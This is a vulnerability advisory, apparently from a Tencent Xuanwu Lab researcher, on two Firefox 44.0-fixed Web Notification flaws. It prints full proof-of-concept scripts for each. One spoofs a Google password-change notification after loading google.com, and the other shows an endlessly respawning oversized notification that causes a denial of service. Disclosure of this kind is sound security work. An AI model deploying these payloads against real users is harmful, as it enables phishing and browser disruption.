Vulnerability Details:
Fixed on Firefox44.0
(1) In the notification dialog, no originates hints and warnings.The attacker can then display a malicious notification dialog to the user that seemingly originates from the trusted site. Typically this notification dialog would mimic the legitimate site. An attacker may exploit this vulnerability to spoof an interface of a trusted web site.
Origin Spoof Demo:http://xisigr.com/test/notification/1.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
<script> window.addEventListener('load', function () { if (window.Notification && Notification.permission !== "granted") { Notification.requestPermission(function (status) { if (Notification.permission !== status) { Notification.permission = status; } }); } var button = document.getElementsByTagName('button')[0]; button.addEventListener('click', function () { if (window.Notification && Notification.permission === "granted") { window.open("http://www.google.com",'_self'); dd = function(){ var n = new Notification( "Google", { body:'Please change your password', icon:'https://www.google.com.hk/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png' } ); } setTimeout(dd,50); } }); }); </script> <button>Notify me!</button> |
(2)Web Notification will be fully displayed, resulting in full screen display notification dialog to denial of service attack.
FullScreen Display DOS Demo:http://xisigr.com/test/notification/2.html
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
<script> window.addEventListener('load', function () { if (window.Notification && Notification.permission !== "granted") { Notification.requestPermission(function (status) { if (Notification.permission !== status) { Notification.permission = status; } }); } var button = document.getElementsByTagName('button')[0]; button.addEventListener('click', function () { if (window.Notification && Notification.permission === "granted") { dd = function(){ var n = new Notification( "11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111", { body:'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ', } ); n.onclose = function () { setTimeout(function () { dd(); }, 0); } } setTimeout(dd,50); } }); }); </script> <button>Notify me!</button> |
References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1220519
CREDIT:
This vulnerability was discovered by xisigr of Tencent’s Xuanwu LAB(http://www.tencent.com).
Email:xisigr@gmail.com